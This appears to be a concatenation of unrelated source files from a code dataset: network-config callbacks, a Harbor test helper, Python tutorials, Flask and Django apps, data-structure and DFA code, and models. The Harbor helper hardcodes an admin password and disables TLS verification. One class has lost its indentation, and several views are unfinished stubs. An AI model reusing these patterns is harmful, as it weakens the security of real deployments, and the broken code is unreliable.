        if up_map_devices_device_eem_applets_event_manager_applet_actions_action[1] == 'key-delete-create' or up_map_devices_device_eem_applets_event_manager_applet_actions_action[1] == 'key-create':
            device_eem_applets.eem_applets.event_manager_applet.actions.action().create(sdata, dev, inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'], up_map_devices_device_eem_applets_event_manager_applet_actions_action[0], addref=True)
        if up_map_devices_device_eem_applets_event_manager_applet_actions_action[1] == 'key-unchanged':
            device_eem_applets.eem_applets.event_manager_applet.actions.action().update(sdata, dev, inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'], fill_map_devices_device_eem_applets_event_manager_applet_actions_action(inputdict, pinputdict=pinputdict, sdata=sdata, update=True))
@staticmethod
def process_service_delete_data(smodelctx, sdata, **kwargs):
    """callback called for delete operation"""
    # NOTE(review): generated callback; `modify` is a hardcoded enable switch.
    modify = True
    if modify and kwargs is not None:
        # Trace every callback argument for debugging.
        for key, value in kwargs.items():
            log("%s == %s" %(key,value))
    if modify:
        config = kwargs['config']
        inputdict = kwargs['inputdict']
        dev = kwargs['dev']
        id = kwargs['id']
        opaque_args = kwargs['hopaque']
        # Delegate to the hand-written deletion hook; device-side removal of
        # the action entry is handled via reference counting elsewhere.
        import cpedeployment.cpedeployment_grouping_lib.eem_applet_customization
        cpedeployment.cpedeployment_grouping_lib.eem_applet_customization.grouping_delete_eem_applet_event_manager_applet_actions_action(smodelctx, sdata, xpath='managed-cpe-services/customer/eem-applets/event-manager-applet/actions/action', **kwargs)
        if dev is None or (isinstance(dev, list) and len(dev) == 0):
            return
def fill_map_devices_device_eem_applets_event_manager_applet_actions_action(inputdict, sdata=None, pinputdict={}, delete=False, update=False):
    """Build the device-side payload dict for one EEM applet action.

    Every plain field is copied from `inputdict`, or blanked to '' when
    `delete` is set.  The list key 'label' is special: it is never blanked,
    and on `update` it falls back to the previous value (`pinputdict`) when
    the new value is None.
    """
    # Field order matches the device model's expected insertion order;
    # 'label' (the list key) sits in its original position.
    field_order = ('first_operand', 'cli_string', 'syslog_priority',
                   'syslog_msg', 'action_statement', 'label',
                   'second_operand', 'comment_string', 'cli_type',
                   'exit_result', 'handle_error_type', 'input_string',
                   'regex_pattern', 'compare')
    payload = {}
    for field in field_order:
        if field == 'label':
            if update and inputdict['label'] is None:
                payload['label'] = pinputdict['label']
            else:
                payload['label'] = inputdict['label']
        else:
            payload[field] = '' if delete else inputdict[field]
    return payload
def fill_up_map_devices_device_eem_applets_event_manager_applet_actions_action(inputdict, pinputdict, sdata=None):
    """Build the update payload and classify how the list key changed.

    Returns a two-element list [payload_dict, schema] where schema is one of
    'no-change', 'key-unchanged', 'key-create', 'key-delete' or
    'key-delete-create', derived from the 'label' key in `inputdict` (new
    values) versus `pinputdict` (previous values).
    """
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action = {}
    # Copy every field straight from the new input values.
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['first_operand'] = inputdict['first_operand']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['cli_string'] = inputdict['cli_string']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['syslog_priority'] = inputdict['syslog_priority']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['syslog_msg'] = inputdict['syslog_msg']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['action_statement'] = inputdict['action_statement']
    # The list key: prefer the new label when present and non-empty,
    # otherwise keep the previous one.
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['label'] = inputdict['label'] if inputdict['label'] is not None and inputdict['label'] != '' else pinputdict['label']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['second_operand'] = inputdict['second_operand']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['comment_string'] = inputdict['comment_string']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['cli_type'] = inputdict['cli_type']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['exit_result'] = inputdict['exit_result']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['handle_error_type'] = inputdict['handle_error_type']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['input_string'] = inputdict['input_string']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['regex_pattern'] = inputdict['regex_pattern']
    up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['compare'] = inputdict['compare']
    # Safety net: if both new and previous label resolved to None above.
    if up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action.get('label') is None:
        up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['label'] = pinputdict['label']
    # No field changed at all -> nothing to push.
    if inputdict['first_operand'] is None and inputdict['cli_string'] is None and inputdict['syslog_priority'] is None and inputdict['syslog_msg'] is None and inputdict['action_statement'] is None and inputdict['label'] is None and inputdict['second_operand'] is None and inputdict['comment_string'] is None and inputdict['cli_type'] is None and inputdict['exit_result'] is None and inputdict['handle_error_type'] is None and inputdict['input_string'] is None and inputdict['regex_pattern'] is None and inputdict['compare'] is None:
        return [up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action, 'no-change']
    up_schema = 'key-unchanged'
    del_mandatory = False
    # NOTE(review): generated classification -- when both old and new labels
    # are set the entry is always treated as delete-then-create, even if the
    # label value is identical; confirm this matches the framework's intent.
    if inputdict['label'] is not None and pinputdict['label'] is not None:
        up_schema = 'key-delete-create'
        return [up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action, up_schema]
    elif inputdict['label'] == '':
        # Label explicitly cleared (previous label was None to reach here).
        up_schema = 'key-delete'
        del_mandatory = True
    elif inputdict['label'] is None and pinputdict['label'] is None:
        up_schema = 'no-change'
    elif inputdict['label'] is not None:
        # New label set where none existed before.
        up_schema = 'key-create'
    else:
        up_schema = 'key-unchanged'
    # Fold the mandatory-delete flag into the final schema.
    if del_mandatory and up_schema != 'key-create':
        up_schema = 'key-delete'
    elif del_mandatory and up_schema == 'key-create':
        up_schema = 'key-delete-create'
    return [up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action, up_schema]
class DeletePreProcessor(yang.SessionPreProcessor):
    """Session pre-processor hook run before a delete session is reserved."""

    def processBeforeReserve(self, session):
        """Add any move operations for Deletion"""
        # FIX: the docstring above was originally placed *after* the first
        # statement, making it a no-op string literal rather than a docstring.
        operations = session.getOperations()
        log('operations: %s' % (operations))
class CreatePreProcessor(yang.SessionPreProcessor):
    """Session pre-processor hook run before a create session is reserved."""

    def processBeforeReserve(self, session):
        """Add any move operations for creation"""
        # FIX: the docstring above was originally placed *after* the first
        # statement, making it a no-op string literal rather than a docstring.
        operations = session.getOperations()
        log('operations: %s' % (operations))
|
996,185 | a32e2bc38e2dbc8090041c90e1a19dad1c1e0eff | import time
import os
import sys
sys.path.append(os.environ["SWAGGER_CLIENT_PATH"])
from swagger_client.rest import ApiException
import swagger_client.models
from pprint import pprint
admin_user = "admin"
admin_pwd = "Harbor12345"
harbor_server = os.environ["HARBOR_HOST"]
#CLIENT=dict(endpoint="https://"+harbor_server+"/api")
ADMIN_CLIENT=dict(endpoint = "https://"+harbor_server+"/api", username = admin_user, password = admin_pwd)
USER_ROLE=dict(admin=0,normal=1)
TEARDOWN = True
def GetProductApi(username, password, harbor_server= os.environ["HARBOR_HOST"]):
    """Build a Harbor ProductsApi client authenticated with basic credentials.

    NOTE(review): the harbor_server default is read from the environment once,
    at import time -- later changes to HARBOR_HOST are not picked up.
    """
    cfg = swagger_client.Configuration()
    cfg.host = "https://"+harbor_server+"/api"
    cfg.username = username
    cfg.password = password
    # Test environment uses self-signed certs; skip TLS verification and
    # enable client-side request logging.
    cfg.verify_ssl = False
    cfg.debug = True
    api_client = swagger_client.ApiClient(cfg)
    api_instance = swagger_client.ProductsApi(api_client)
    return api_instance
class TestResult(object):
def __init__(self):
self.num_errors = 0
self.error_message = []
def add_test_result(self, error_message):
self.num_errors = self.num_errors + 1
self.error_message.append(error_message)
def get_final_result(self):
if self.num_errors > 0:
for each_err_msg in self.error_message:
print "Error message:", each_err_msg
raise Exception(r"Test case failed with {} errors.".format(self.num_errors))
|
996,186 | d05737653713752f45977ee2dd98e023e8f1cbb5 | # empty list # my_list = []
# list of integers # my_list = [1, 2, 3]
# list with mixed data types # my_list = [1, "Hello", 3.4]
# nested list # my_list = ["mouse", [8, 4, 6], ['a']]
# Defining list
list1 = list([1, 3, 5])
print('The Normal list {0} '.format(list1))
# List Index
print('first value is {0} '.format(list1[0]))
print('second value is {0} '.format(list1[-2]))
print('from second to third value is {0} '.format(list1[1:3]))
print('first and third values is {0} and {1} '.format(list1[0], list1[2]))
print('from beginning to second value is {0} '.format(list1[:2]))
# Change element
list1[0] = 4
print('Here is the change {0}'.format(list1))
# add elements
list1.append(7)
print('added element {0}'.format(list1))
list1.extend([9,11,13])
print('added elements {0}'.format(list1))
# remove elements
list1.remove(13) # (The element itself)
print('element deleted : {0}'.format(list1))
list1.pop(5) # (The Index Number)
print('element deleted : {0}'.format(list1))
# list1.clear() # removing everything
print('elements cleared : {0}'.format(list1))
# some tricks
# list1.sort() # sort A-Z
# list1.reverse() # reverse order
# list1.count() # save to main list
# list1.insert(6, 1) # add element in specific index
# print('list manipulated {0}'.format(list1))
# print(9 in list1) # Membership test
# print(list1[1] is 3) # validate test
|
996,187 | aed574f25b363b9613b4c595a8001055fded6eef | """
#ch11_26 遞迴式函數設計
#特色:每次呼叫自己時,都會使範圍越來越小;必須要有一個終止條件來結束遞迴函數
def factorial(n):
#計算n的階乘,n必須為整數
if n == 1:
return 1
else:
return (n * factorial(n-1)) #5*後,開啟一個4的factorial程式,得出4*....直到輸出1,5*4*3*2*factorial(1)
value = 3
print(value, "的階乘結果是 =", factorial(value))
value = 5
print(value, "的階乘結果是 =", factorial(value))
"""
"""
#ch11_30_2 global 應用
def printmsg():
global msg
msg = "Java"
    print("函數列印:更改後:", msg)
msg = "Python"
print("主程式列印:更改前", msg)
printmsg()
print("主程式列印:更改後", msg)
"""
"""
#ch11_31 匿名函數的應用 lambda
def square(x):
value = x ** 2
return value
print(square(10))
square = lambda x: x **2
print(square(10))
"""
"""
#ch11_34 匿名函數使用與filter
def oddfn(x):
return x if (x % 2 == 1) else None
mylist = [5, 10, 15, 20, 25, 30]
filter_object = filter(oddfn, mylist)
print("奇數串列嗎:", [item for item in filter_object])
"""
# #Ch11_37
# mylist = [5, 10, 15, 20, 25, 30]
# squarelist = list(map(lambda x: x ** 2, mylist)) # map(func, iterable),可以將string, list, tuple, 的item放進去function進行計算。
# print("串列平方值:", squarelist)
"""
#ch11_39_1 設計自己的range()
def myRanger(start = 0, stop = 100, step = 1):
n = start
while n < stop:
yield n
n += step
print(type(myRanger))
for x in myRanger(0, 5):
print(x)
#設計之函數資料型態為function,與range類似,但回傳值不是使用return 而是yield,同時整個函數內部不是立即執行,第一次for回圈執行到yield時會回傳n,下一次會繼續執行n+=6ㄝ然後回到起點執行到yield,直到沒有直回傳。
"""
"""
#ch11_39_2 裝飾器(Decorator)
#可以將函數程式傳入另一個函數程式
def upper(func): #裝飾器 #func = greeting()
def newFunc(args):
oldresult = func(args) #greeting(args) => return args
newresult = oldresult.upper() # (args).upper()
print("函數名稱:", func.__name__)
print("函數參數:", args)
return newresult
return newFunc
@upper #設定裝飾器
def greeting(string): #問號函數
return string
# mygreeting = upper(greeting) #手動裝飾器
# print(mygreeting("Hello! iPhone")) #輸入 "Hello! iPhone" => string
print(greeting("Hello! iPhone"))
"""
# #ch11_39_4 除法除錯器
# """裝飾器應用"""
# def errcheck(func):
# def newFunc(*args):
# if args[1] != 0: #除數不等於0時
# result = func(*args)
# else:
# result = "除數不可爲0"
# print("函數名稱:", func.__name__)
# print("函數參數:", args)
# print("執行結果:", result)
# return result
# return newFunc
# @errcheck
# def mydiv(x, y):
# return x/y
# print(mydiv(6, 3))
# print(mydiv(6, 0)) |
996,188 | 40a682dbbba03e4ee23ca45db37a49f198bfd2c8 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
import json,os,sys
from flask import request, g, jsonify
from . import Resource
from .. import schemas
class Dentists(Resource):
    """REST resource backed by a JSON file of dentist records."""

    def get(self):
        """Return every dentist stored in the JSON data file."""
        with open(sys.path[0]+'/v1/api/dentists.json') as json_data:
            records = json.load(json_data)
        return jsonify({"dentists": records['dentists']})

    def post(self):
        """Append a new dentist (id = last id + 1) and persist the file."""
        filename = sys.path[0]+'/v1/api/dentists.json'
        with open(filename) as json_data:
            records = json.load(json_data)
        new_entry = {
            'id': records['dentists'][-1]['id'] + 1,
            'name': g.json['name'],
            'location': g.json['location'],
            'spec': g.json['specialisation'],
        }
        records['dentists'].append(new_entry)
        with open(filename, "w") as jsonFile:
            json.dump(records, jsonFile, indent=4)
        return jsonify({"dentists": records['dentists']})
|
996,189 | f588ae7733dbb3d9cee36b10985504d5af4dd485 | import onnx
from onnx_tf.backend import prepare
onnx_model = onnx.load('dbface.onnx')
tf_rep = prepare(onnx_model)
tf_rep.export_graph('dbface_tf.pb') |
996,190 | f03948898f21e3900fd5898fef6639bb0b0665d4 | class Node:
def __init__(self, value=None):
self.value = value
self.next = None
def __str__(self):
return str(self.value)
class LinkedList:
    """Minimal singly linked list tracked by head and tail pointers."""

    def __init__(self):
        self.head = self.tail = None
class Queue:
    """FIFO queue implemented on top of the LinkedList/Node classes above.

    Note: dequeue() and peek() return the wrapping Node (not the raw value);
    callers read `.value` on the result -- see search_bt/insert_node_bt.
    """
    def __init__(self):
        self.linkedList = LinkedList()
    def __str__(self):
        # BUG FIX: the original did `for x in self.linkedList`, but
        # LinkedList defines no __iter__, so str(queue) raised TypeError.
        # Walk the node chain explicitly instead.
        values = []
        node = self.linkedList.head
        while node is not None:
            values.append(str(node.value))
            node = node.next
        return ' '.join(values)
    def enqueue(self, value):
        """Append a value at the tail; O(1)."""
        newNode = Node(value)
        if self.linkedList.head == None:
            self.linkedList.head = newNode
            self.linkedList.tail = newNode
        else:
            self.linkedList.tail.next = newNode
            self.linkedList.tail = newNode
    def isEmpty(self):
        """Return True when the queue holds no nodes."""
        if self.linkedList.head == None:
            return True
        else:
            return False
    def dequeue(self):
        """Remove and return the head Node, or a message string when empty."""
        if self.isEmpty():
            return "There is not any node in the Queue"
        else:
            tempNode = self.linkedList.head
            # Single-element queue: clear both pointers.
            if self.linkedList.head == self.linkedList.tail:
                self.linkedList.head = None
                self.linkedList.tail = None
            else:
                self.linkedList.head = self.linkedList.head.next
            return tempNode
    def peek(self):
        """Return the head Node without removing it, or a message when empty."""
        if self.isEmpty():
            return "There is not any node in the Queue"
        else:
            return self.linkedList.head
    def delete(self):
        """Drop every node by resetting head and tail."""
        self.linkedList.head = None
        self.linkedList.tail = None
class TreeNode:
    """Binary tree node with a payload and two child links."""
    def __init__(self, data):
        self.data = data
        # Child pointers; None means the slot is free.
        self.leftChild = None
        self.rightChild = None
def search_bt(rootNode, nodeValue):
    """Breadth-first search a binary tree for nodeValue.

    Returns "Success" when found, "Not found" otherwise, or an error string
    when rootNode is falsy.  Uses the linked-list Queue above; dequeue()
    returns the wrapping list Node, hence the `.value.` hops below.
    """
    if not rootNode:
        return "The BT does not exist"
    else:
        customQueue = Queue()
        customQueue.enqueue(rootNode)
        while not(customQueue.isEmpty()):
            # `root` is a list Node whose .value is the TreeNode.
            root = customQueue.dequeue()
            if root.value.data == nodeValue:
                return "Success"
            if (root.value.leftChild is not None):
                customQueue.enqueue(root.value.leftChild)
            if (root.value.rightChild is not None):
                customQueue.enqueue(root.value.rightChild)
        return "Not found"
def insert_node_bt(rootNode, newNode):
    """Insert newNode at the first free child slot, level by level (BFS).

    NOTE(review): when rootNode is falsy the assignment below only rebinds
    the local name -- the caller's tree is NOT modified and None (not a
    status string) is returned.  Confirm callers always pass a real root.
    """
    if not rootNode:
        rootNode = newNode
    else:
        customQueue = Queue()
        customQueue.enqueue(rootNode)
        while not(customQueue.isEmpty()):
            # `root` is a list Node whose .value is the TreeNode.
            root = customQueue.dequeue()
            if root.value.leftChild is not None:
                customQueue.enqueue(root.value.leftChild)
            else:
                root.value.leftChild = newNode
                return "Successfully Inserted"
            if root.value.rightChild is not None:
                customQueue.enqueue(root.value.rightChild)
            else:
                root.value.rightChild = newNode
                return "Successfully Inserted"
def delete_bt(rootNode):
    """Clear a binary tree by wiping the root's payload and child links."""
    rootNode.data = rootNode.leftChild = rootNode.rightChild = None
    return "The BT has been successfully deleted"
|
996,191 | ede13f3694b5534c0d002b5613c15af9d37e9dc2 | valor = float(raw_input())
if valor >= 0.00 and valor <= 2000.00:
print "Isento"
elif valor >= 2000.01 and valor <= 3000.00:
extraum = 2000 - abs(valor)
taxaum = extraum * 8/100
print "R$ %.2f" %(abs(taxaum))
elif valor > 3000 and valor <= 4500.00:
extradois = valor - 3000
taxaextra = extradois * 18/100
total = 80.00 + taxaextra
print "R$ %.2f" %(total)
else:
extradoiss = valor - 4500
taxaextraa = extradoiss * 28/100
totall = 80.00 + 270.00 + taxaextraa
print "R$ %.2f" %(totall)
|
996,192 | dea4610b38cd6d4e1959e0c1c12d0a1076370ee9 | #code written by John Andrews
#last updated on Dec 5 2018
#This file contains code for determining properties about a DFA.
import queue
def determine_empty(input_dfa):
    """Return True iff the DFA accepts no string at all."""
    finals = input_dfa.get_finals()
    # If the start state is final, epsilon is accepted -> not empty.
    if 0 in finals:
        return False
    # Otherwise the language is empty exactly when no final state is
    # reachable from the start state.
    reachable = get_reachability_from(input_dfa, 0)
    return not overlap(finals, reachable)
def get_reachability_from(input_dfa, state):
    """Return the list of states reachable from `state` via one or more
    transitions (the start state itself is included only if re-entered)."""
    transitions = input_dfa.get_transit_tab()
    pending = queue.Queue()
    pending.put(state)
    seen = []
    while not pending.empty():
        current = pending.get()
        # Follow every outgoing transition from the current state.
        for symbol, target in transitions[current].items():
            if target not in seen:
                pending.put(target)
                seen.append(target)
    return seen
def determine_infinite(input_dfa):
    """Return True iff the DFA's language is infinite.

    A regular language is infinite exactly when some state lies on a cycle,
    is reachable from the start state, and can reach a final state.
    """
    infinite = False
    if determine_empty(input_dfa):#if it is empty, it is certainly not infinite
        return infinite
    # Precompute reachability from every state.
    reachability_by_state = []
    num_states = len(input_dfa.get_transit_tab())
    for x in range(0, num_states):
        reach = get_reachability_from(input_dfa,x)
        reachability_by_state.append(reach)
    #determine the finals that actually matter
    visitable_states = reachability_by_state[0]
    finals = input_dfa.get_finals()
    reachable_finals = []
    for x in finals:
        if x in visitable_states:
            reachable_finals.append(x)
    #look for states that meet the requirements for infinite
    for x in range(0,num_states):
        # x in its own reachability set means x sits on a cycle.
        if x in reachability_by_state[x]:#if there is a loop
            if x in reachability_by_state[0]:#if the loop can be reached from the initial state
                if overlap(reachable_finals, reachability_by_state[x]):#if you can reach a final state
                    infinite = True
    return infinite
def overlap(l1, l2):
    """Return True when the two lists share at least one element."""
    # Iterate the shorter list and probe the longer one, keeping the
    # worst case at min(len(l1), len(l2)) membership tests.
    if len(l1) < len(l2):
        shorter, longer = l1, l2
    else:
        shorter, longer = l2, l1
    return any(item in longer for item in shorter)
|
996,193 | 1456afb4c31cd010fc385ae9e2f0fb95a0669925 | import datetime
# Module-wide counter used to hand out unique note ids.
last_id = 0

# define a note
class Note:
    """A memo with optional tags, a creation date and an auto-assigned id."""

    def __init__(self, memo, tags=''):
        global last_id
        self.memo = memo
        self.tags = tags
        self.creationDate = datetime.date.today()
        last_id += 1
        self.__id = last_id

    def getId(self):
        """Return this note's unique id."""
        return self.__id
996,194 | b37fdeb1e59c7e7fa7e566bb44b1d58aa364ee71 | # -*- coding: utf-8 -*-
"""Tests using pytest_resilient_circuits"""
import pytest
from json import dumps
from mock import patch
from fn_microsoft_security_graph.lib.ms_graph_helper import MSGraphHelper
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
PACKAGE_NAME = "fn_microsoft_security_graph"
FUNCTION_NAME = "microsoft_security_graph_get_alert_details"
# Read the default configuration-data section from the package
config_data = get_config_data(PACKAGE_NAME)
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def generate_response(content, status):
    """Build a minimal stand-in for a `requests`-style response object,
    exposing status_code, content, text (JSON-serialized) and json()."""
    class _FakeResponse:
        def __init__(self, payload, code):
            self.status_code = code
            self.content = payload
            self.text = dumps(payload)

        def json(self):
            return self.content

    return _FakeResponse(content, status)
def call_microsoft_security_graph_get_alert_details_function(circuits, function_params, timeout=10):
    """Fire the function message on the circuits test harness and wait for
    its result event, returning the FunctionResult value."""
    # Fire a message to the function
    evt = SubmitTestFunction("microsoft_security_graph_get_alert_details", function_params)
    circuits.manager.fire(evt)
    event = circuits.watcher.wait("microsoft_security_graph_get_alert_details_result", parent=evt, timeout=timeout)
    assert event
    assert isinstance(event.kwargs["result"], FunctionResult)
    # Block until the function reports completion, then unwrap the payload.
    pytest.wait_for(event, "complete", True)
    return event.kwargs["result"].value
class TestMicrosoftSecurityGraphGetAlertDetails:
    """ Tests for the microsoft_security_graph_get_alert_details function"""

    def test_function_definition(self):
        """ Test that the package provides customization_data that defines the function """
        func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
        assert func is not None

    # Patch both the OAuth2 session's authenticate (token POST) and get
    # (Graph API GET) so no network traffic occurs.
    @patch('fn_microsoft_security_graph.lib.ms_graph_helper.OAuth2ClientCredentialsSession.get')
    @patch('fn_microsoft_security_graph.lib.ms_graph_helper.OAuth2ClientCredentialsSession.authenticate')
    def test_get_alert_details(self, mocked_requests_post, mocked_requests_get):
        """Alert-details GET should return the mocked Graph payload."""
        # Simulated token endpoint response.
        content = {
            "access_token": "fake_access_token"
        }
        # Simulated alert-details response body.
        content2 = {
            "alert_details": {
                "details": 1234
            }
        }
        mocked_requests_post.return_value = generate_response(content, 200)
        mocked_requests_get.return_value = generate_response(content2, 200)
        ms_helper = MSGraphHelper("ms_token_url", "ms_graph_url", "tenant_id1234", "client_id1234", "client_secret1234")
        response = ms_helper.ms_graph_session.get("{}/security/alerts/{}".format("ms_graph_url", "1223456788"))
        assert response.json() == content2
|
996,195 | 3c9676d9c012c9f1e2cc2b4e095044188a6eaeb1 | from flask_restful import Resource
from flask import request
from models.schema.user import UserSchema
from models.user import UserModel
user_schema = UserSchema(many=False)
def get_param():
    """Return the request payload: the JSON body when one was sent,
    otherwise the submitted form data."""
    payload = request.get_json(force=False)
    return payload if payload is not None else request.form
class UserResource (Resource):
    """CRUD endpoints for a single user, addressed by username."""

    def get(self, name):
        """Fetch one user; 403 with a message when the name is unknown."""
        user = UserModel.get_user(name)
        if not user:
            return {
                'message': 'username not exist!'
            }, 403
        return {
            'message': '',
            'user': user_schema.dump(user).data
        }

    def post(self, name):
        """Create a user from the request payload; 433 on validation errors."""
        result = user_schema.load(get_param())
        if len(result.errors) > 0:
            return result.errors, 433
        user = UserModel(name, result.data['email'], result.data['password'])
        user.add_user()
        return {
            'message': 'Insert user success',
            'user': user_schema.dump(user).data
        }

    def put(self, name):
        """Update email/password of an existing user; 433 on validation
        errors, 403 when the user does not exist."""
        result = user_schema.load(get_param())
        if len(result.errors) > 0:
            return result.errors, 433
        user = UserModel.get_user(name)
        if not user:
            return {
                'message': 'username not exist!'
            }, 403
        user.email = result.data['email']
        user.password = result.data['password']
        user.update_user()
        return {
            'message': 'Update user success',
            'user': user_schema.dump(user).data
        }

    def delete(self, name):
        """Delete an existing user; 403 when the user does not exist."""
        user = UserModel.get_user(name)
        if not user:
            return {
                'message': 'username not exist!'
            }, 403
        user.delete_user()
        return {
            'message': 'Delete done!'
        }
class UsersResource(Resource):
    """Collection endpoint returning every user."""

    def get(self):
        all_users = UserModel.get_all_user()
        return {
            'message': '',
            'users': user_schema.dump(all_users, True).data
        }
|
996,196 | 311d8783ae77b7b191ade3c4d0cd113779b63b7f | from peewee import CharField, DateTimeField, BooleanField, SmallIntegerField, DeferredForeignKey
from .base_model import BaseModel
from datetime import datetime
class Todo(BaseModel):
    """Peewee model for a todo item attached to a Note."""
    # Owning note; cascade-deletes todos when the note goes away.
    note = DeferredForeignKey("Note", null=False, on_delete='cascade', backref='todos', column_name="note_id")
    title = CharField(default="")
    content = CharField(default="")
    remark = CharField(default="")
    # Timestamp set when the todo is marked finished (cleared otherwise).
    finished_at = DateTimeField()
    is_finished = BooleanField(default=False)
    # Free-form group name used to bucket todos in the UI.
    group = CharField()
    priority = SmallIntegerField(default=0)
    def set_finished(self, is_finished=True):
        """Toggle the finished flag, stamping/clearing finished_at, and save."""
        self.is_finished = is_finished
        if is_finished:
            self.finished_at = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        else:
            self.finished_at = None
        self.save()
    @classmethod
    def set_group(cls, todos, group_name):
        """Assign `group_name` to one Todo or a list of Todos and save each.

        Returns False (no-op) when group_name is empty; raises on any other
        `todos` type.
        """
        if not group_name:
            return False
        if isinstance(todos, list):
            for item in todos:
                item.group = group_name
                item.save()
        elif isinstance(todos, Todo):
            todos.group = group_name
            todos.save()
        else:
            raise RuntimeError('unexpected todos param')
    @classmethod
    def get_groups(cls, note_id=None):
        """Return the distinct group names (optionally for one note).

        NOTE(review): the empty-result fallback calls the global `_` gettext
        helper, which must be installed by the app at runtime -- confirm.
        """
        query = Todo.select(Todo.group).distinct()
        if note_id:
            query = query.where(Todo.note_id == note_id)
        groups = [item.group for item in query]
        if len(groups):
            return groups
        else:
            return [_("todo.no_group")]
    class Meta:
        table_name = "todos"
|
996,197 | 1ad11c444e4f3c003b7132e0551b7650e3b6ba54 | ##### E-Commerce Website Clone
##### Mason Brewer
##### April 5th, 2019
from django.shortcuts import render, redirect
from time import gmtime, strftime
import random, datetime, bcrypt
from .models import *
from django.contrib import messages
from decimal import Decimal
from apps.UIApp.models import User, Order
# GET: Loads the login page for workers.
def loginPage(request):
    """GET: show the admin login form, or skip straight to the orders page
    when the session is already marked as logged in."""
    if request.session.get("adminLoggedIn"):
        return redirect("/admin/orders")
    return render(request, 'AdminApp/login.html')
# POST: Processes a login request.
def loginProcess(request):
    """POST: validate admin credentials; on success store the admin id and
    logged-in flag in the session and redirect to the orders page."""
    if request.method == "GET":
        return redirect("/login")
    if request.method == "POST":
        errors = Admin.objects.loginValidator(request.POST)
        if len(errors) > 0:
            # Surface each validation error as a tagged flash message.
            for key, value in errors.items():
                messages.error(request, value, extra_tags=key)
            return redirect("/admin/login")
        else:
            request.session['currentAdminId'] = Admin.objects.get(email = request.POST['email']).id
            request.session["adminLoggedIn"] = True
            return redirect("/admin/orders")
# POST: Processes a login with parameters, a special case use.
def paramLogin(request, pHash):
    """TODO: not implemented -- log an admin in via a hashed URL parameter."""
    pass
# GET: Loads list of orders.
def ordersPage(request):
    """GET: list all orders for a logged-in admin."""
    # FIX: use .get() -- direct indexing raised KeyError on a fresh session
    # where "adminLoggedIn" was never set; also matches loginPage's style.
    if not request.session.get("adminLoggedIn"):
        return redirect("/admin/login")
    else:
        context = {
            "admin": Admin.objects.get(id = request.session["currentAdminId"]),
            "orders": Order.objects.all()
        }
        return render(request, 'AdminApp/orders.html', context)
# GET: Loads list of products.
def productsPage(request):
    """GET: list all products for a logged-in admin."""
    # FIX: use .get() -- direct indexing raised KeyError on a fresh session
    # where "adminLoggedIn" was never set; also matches loginPage's style.
    if not request.session.get("adminLoggedIn"):
        return redirect("/admin/login")
    else:
        context = {
            "admin": Admin.objects.get(id = request.session["currentAdminId"]),
            "products": Product.objects.all()
        }
        return render(request, 'AdminApp/products.html', context)
# POST: Deletes product.
def productDelete(request):
    """TODO: not implemented -- delete a product."""
    pass
# GET: Loads a specific order.
def orderViewPage(request, orderID):
    """TODO: not implemented -- show a specific order."""
    pass
# POST: Changes the status of the order.
def changeStatus(request):
    """TODO: not implemented -- change the status of an order."""
    pass
# GET: Loads the create page for a product.
def productNewPage(request):
    """GET: render the new-product form with every category to choose from."""
    context = {
        "categories": Category.objects.all()
    }
    return render(request, 'AdminApp/newProduct.html', context)
# POST: Submits the new product.
def productNewProcess(request):
    """POST: validate and create a new product, then show the product list."""
    if request.method == "GET":
        return redirect("/admin/product/new")
    if request.method == "POST":
        postCopy = request.POST.copy()
        # Price arrives as text; convert so validator and model see a Decimal.
        if postCopy["price"]:
            postCopy["price"] = Decimal(postCopy["price"])
        errors = Product.objects.newValidator(postCopy)
        if len(errors) > 0:
            for key, value in errors.items():
                messages.error(request, value, extra_tags = key)
            return redirect("/admin/product/new")
        else:
            # NOTE(review): if "category" is empty, catInput is never bound
            # and the create() call below raises NameError -- confirm the
            # validator guarantees a category, or guard this branch.
            if postCopy["category"]:
                catInput = Category.objects.get(id = postCopy["category"])
            Product.objects.create(name = postCopy["name"], description = postCopy["description"],
                price = postCopy["price"], imageURL = postCopy["imageURL"],
                category = catInput)
            return redirect("/admin/products")
# GET: Loads the edit page for a product.
def productEditPage(request):
    """GET: render the product edit form."""
    return render(request, 'AdminApp/editProduct.html')
# POST: Submits the edit of a product.
def productEditProcess(request):
    """TODO: not implemented -- apply a product edit."""
    pass
# POST: Add a new Category.
def categoryNewProcess(request):
    """POST: validate and create a new category, always returning to the
    new-product form (where categories are managed)."""
    if request.method == "GET":
        return redirect("/admin/product/new")
    if request.method == "POST":
        errors = Category.objects.newValidator(request.POST)
        if len(errors) > 0:
            for key, value in errors.items():
                messages.error(request, value, extra_tags=key)
            return redirect("/admin/product/new")
        else:
            Category.objects.create(title = request.POST["title"])
            return redirect("/admin/product/new")
# GET: Shows all of the administrator accounts (subject to change).
def adminsPage(request):
    """GET: list all administrator accounts for a logged-in admin."""
